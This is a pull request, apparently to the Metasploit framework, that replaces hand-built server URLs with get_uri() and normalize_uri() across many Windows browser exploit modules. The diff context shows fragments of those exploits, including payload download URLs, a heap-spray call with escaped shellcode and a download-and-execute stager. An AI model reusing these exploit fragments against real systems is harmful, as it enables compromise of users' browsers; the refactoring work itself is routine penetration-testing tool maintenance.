### PR TITLE
Replace manual uri constructs with get_uri() (RM#6800)

### DIFF
--- a/modules/exploits/windows/browser/aol_icq_downloadagent.rb
+++ b/modules/exploits/windows/browser/aol_icq_downloadagent.rb
@@ -58,9 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		payload_url =  "http://"
-		payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-		payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/PAYLOAD"
+		payload_url = get_uri(cli) + "/PAYLOAD"
 
 		if (request.uri.match(/PAYLOAD/))
 			return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/aol_icq_downloadagent.rb
+++ b/modules/exploits/windows/browser/aol_icq_downloadagent.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		payload_url = get_uri(cli) + "/PAYLOAD"
+		payload_url = normalize_uri(get_uri(cli), "PAYLOAD")
 
 		if (request.uri.match(/PAYLOAD/))
 			return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
@@ -96,10 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_status("Sending init HTML")
 
 			shellcode = Rex::Text.to_unescape(p.encoded)
-			url =  ((datastore['SSL']) ? "https://" : "http://")
-			url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
-			url << ":" + datastore['SRVPORT'].to_s
-			url << get_resource
+			url =  get_uri(client)
 			js = <<-ENDJS
 					#{js_heap_spray}
 					sprayHeap(unescape("#{shellcode}"), 0x#{target.ret.to_s 16}, 0x4000);

--- a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
@@ -116,10 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_status("Sending initial HTML")
 
 			shellcode = Rex::Text.to_unescape(p.encoded)
-			url =  ((datastore['SSL']) ? "https://" : "http://")
-			url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
-			url << ":" + datastore['SRVPORT'].to_s
-			url << get_resource
+			url =  get_uri(client)
 
 			fname = rand_text_alphanumeric(4)
 

--- a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
+++ b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
@@ -52,9 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		payload_url =  "http://"
-		payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-		payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
+		payload_url =  get_uri(cli) + "/payload"
 
 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
+++ b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
@@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		payload_url =  get_uri(cli) + "/payload"
+		payload_url =  normalize_uri(get_uri(cli), "payload")
 
 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
+++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
@@ -92,9 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		url =  "http://"
-		url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-		url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
+		url =  get_uri(cli) + "/"
 
 		#VBScript variables
 		clsid                 = "79956462-F148-497F-B247-DF35A095F80B"

--- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
+++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		url =  get_uri(cli) + "/"
+		url =  get_uri(cli)
 
 		#VBScript variables
 		clsid                 = "79956462-F148-497F-B247-DF35A095F80B"

--- a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
+++ b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
@@ -73,9 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		payload_url =  "http://"
-		payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-		payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/#{@payload_rand}"
+		payload_url =  get_uri(cli) + "/#{@payload_rand}"
 
 		if (request.uri.match(/#{@payload_rand}/))
 			return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
+++ b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
@@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		payload_url =  get_uri(cli) + "/#{@payload_rand}"
+		payload_url =  normalize_uri(get_uri(cli), @payload_rand)
 
 		if (request.uri.match(/#{@payload_rand}/))
 			return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/dxstudio_player_exec.rb
+++ b/modules/exploits/windows/browser/dxstudio_player_exec.rb
@@ -58,9 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		url_base =  "http://"
-		url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-		url_base += ":" + datastore['SRVPORT'].to_s + get_resource()
+		url_base =  get_uri(cli)
 
 		payload_url = url_base + "/payload"
 

--- a/modules/exploits/windows/browser/dxstudio_player_exec.rb
+++ b/modules/exploits/windows/browser/dxstudio_player_exec.rb
@@ -58,9 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		url_base =  get_uri(cli)
-
-		payload_url = url_base + "/payload"
+		payload_url =  normalize_uri(get_uri(cli), "payload")
 
 		# handle request for the payload
 		if (request.uri.match(/payload/))

--- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
+++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		payload_url =  get_uri(cli) + "/payload"
+		payload_url =  normalize_uri(get_uri(cli), "payload")
 
 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
+++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
@@ -61,9 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		payload_url =  "http://"
-		payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-		payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
+		payload_url =  get_uri(cli) + "/payload"
 
 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/macrovision_unsafe.rb
+++ b/modules/exploits/windows/browser/macrovision_unsafe.rb
@@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		payload_url =  get_uri(cli) + "/payload"
+		payload_url =  normalize_uri(get_uri(cli), "payload")
 
 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/macrovision_unsafe.rb
+++ b/modules/exploits/windows/browser/macrovision_unsafe.rb
@@ -51,9 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		payload_url =  "http://"
-		payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-		payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
+		payload_url =  get_uri(cli) + "/payload"
 
 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
+++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
@@ -58,9 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		payload_url =  "http://"
-		payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-		payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
+		payload_url =  get_uri(cli) + "/payload"
 
 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
+++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		payload_url =  get_uri(cli) + "/payload"
+		payload_url =  normalize_uri(get_uri(cli), "payload")
 
 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb
+++ b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb
@@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		@my_host   = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
 		webdav_loc = "\\\\#{@my_host}\\#{@random_dir}\\#{@payload}"
-		@url_base  = "http://" + @my_host
+		@url_base  = get_uri(cli)
 
 		if (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri))
 			print_status "Sending payload executable to target ..."

--- a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb
+++ b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb
@@ -141,8 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("Received WebDAV PROPFIND request for #{path}")
 		body = ''
 
-		my_host   = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-		my_uri    = "http://#{my_host}/"
+		my_uri    = get_uri(cli)
 
 		if path =~ /\.dll$/i
 			# Response for the DLL

--- a/modules/exploits/windows/browser/msvidctl_mpeg2.rb
+++ b/modules/exploits/windows/browser/msvidctl_mpeg2.rb
@@ -189,14 +189,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		j_memory     = rand_text_alpha(rand(100) + 1)
 		j_counter    = rand_text_alpha(rand(30) + 2)
 
-		host = Rex::Socket.source_address(cli.peerhost) + ":" + (datastore["SRVPORT"].to_s)
-		gif_uri = "http#{(datastore['SSL'] ? 's' : '')}://#{host}"
-		if ("/" == get_resource[-1,1])
-			gif_uri << get_resource[0, get_resource.length - 1]
-		else
-			gif_uri << get_resource
-		end
-		gif_uri << "/" + Time.now.to_i.to_s + ".gif"
+		gif_uri = get_uri(cli) + "/" + Time.now.to_i.to_s + ".gif"
 
 		js = %Q|#{j_shellcode}=unescape('#{shellcode}');
 #{j_nops}=unescape('#{nops}');

--- a/modules/exploits/windows/browser/msvidctl_mpeg2.rb
+++ b/modules/exploits/windows/browser/msvidctl_mpeg2.rb
@@ -189,7 +189,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		j_memory     = rand_text_alpha(rand(100) + 1)
 		j_counter    = rand_text_alpha(rand(30) + 2)
 
-		gif_uri = get_uri(cli) + "/" + Time.now.to_i.to_s + ".gif"
+		gif_uri = normalize_uri(get_uri(cli), "#{Time.now.to_i.to_s}.gif")
 
 		js = %Q|#{j_shellcode}=unescape('#{shellcode}');
 #{j_nops}=unescape('#{nops}');

--- a/modules/exploits/windows/browser/real_arcade_installerdlg.rb
+++ b/modules/exploits/windows/browser/real_arcade_installerdlg.rb
@@ -82,8 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		# Payload's URL
-		payload_src  = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-		payload_src << ":" << datastore['SRVPORT'] << get_resource() + "/" + @payload_name + ".exe"
+		payload_src  = get_uri(cli) + "/" + @payload_name + ".exe"
 
 		# Create the stager (download + execute payload)
 		stager_name = rand_text_alpha(6) + ".vbs"

--- a/modules/exploits/windows/browser/real_arcade_installerdlg.rb
+++ b/modules/exploits/windows/browser/real_arcade_installerdlg.rb
@@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		# Payload's URL
-		payload_src  = get_uri(cli) + "/" + @payload_name + ".exe"
+		payload_src  = normalize_uri(get_uri(cli), "#{@payload_name}.exe")
 
 		# Create the stager (download + execute payload)
 		stager_name = rand_text_alpha(6) + ".vbs"

--- a/modules/exploits/windows/browser/safari_xslt_output.rb
+++ b/modules/exploits/windows/browser/safari_xslt_output.rb
@@ -69,9 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		url =  "http://"
-		url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-		url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
+		url =  get_uri(cli) + "/"
 
 		content = <<-EOS
 <?xml-stylesheet type="text/xml" href="#fragment"?>

--- a/modules/exploits/windows/browser/safari_xslt_output.rb
+++ b/modules/exploits/windows/browser/safari_xslt_output.rb
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		url =  get_uri(cli) + "/"
+		url =  get_uri(cli)
 
 		content = <<-EOS
 <?xml-stylesheet type="text/xml" href="#fragment"?>

--- a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
+++ b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
@@ -62,9 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		payload_url =  "http://"
-		payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-		payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/PAYLOAD"
+		payload_url =  get_uri(cli) + "/PAYLOAD"
 
 		if (request.uri.match(/PAYLOAD/))
 			return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
+++ b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		payload_url =  get_uri(cli) + "/PAYLOAD"
+		payload_url =  normalize_uri(get_uri(cli), "PAYLOAD")
 
 		if (request.uri.match(/PAYLOAD/))
 			return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
+++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
@@ -54,9 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		payload_url =  "http://"
-		payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-		payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
+		payload_url =  get_uri(cli) + "/payload"
 
 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
+++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		payload_url =  get_uri(cli) + "/payload"
+		payload_url =  normalize_uri(get_uri(cli), "payload")
 
 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
+++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
@@ -52,9 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		payload_url =  "http://"
-		payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-		payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
+		payload_url =  get_uri(cli) + "/payload"
 
 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
+++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
@@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		payload_url =  get_uri(cli) + "/payload"
+		payload_url =  normalize_uri(get_uri(cli), "payload")
 
 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/webdav_dll_hijacker.rb
+++ b/modules/exploits/windows/browser/webdav_dll_hijacker.rb
@@ -152,8 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("PROPFIND #{path}")
 		body = ''
 
-		my_host   = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-		my_uri    = "http://#{my_host}/"
+		my_uri    = get_uri(cli)
 
 		if path !~ /\/$/
 

--- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
+++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		payload_url =  get_uri(cli) + "/payload"
+		payload_url =  normalize_uri(get_uri(cli), "payload")
 
 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
+++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
@@ -57,9 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def on_request_uri(cli, request)
 
-		payload_url =  "http://"
-		payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-		payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
+		payload_url =  get_uri(cli) + "/payload"
 
 		if (request.uri.match(/payload/))
 			return if ((p = regenerate_payload(cli)) == nil)


### PR DESCRIPTION
Replaces manual URI builds with get_uri() for modules identified in RM #6800:
http://dev.metasploit.com/redmine/issues/6800

No presumptions were made about the correctness of anything other than the components which get_uri would directly replace (i.e. potential double slash situations are left as is). This is done to ensure stability of the modules by not changing anything of how they work.

I tested on a number of the modules by running through them for breakage and/or any other unexpected behaviour vs. the originals and identified no issues.
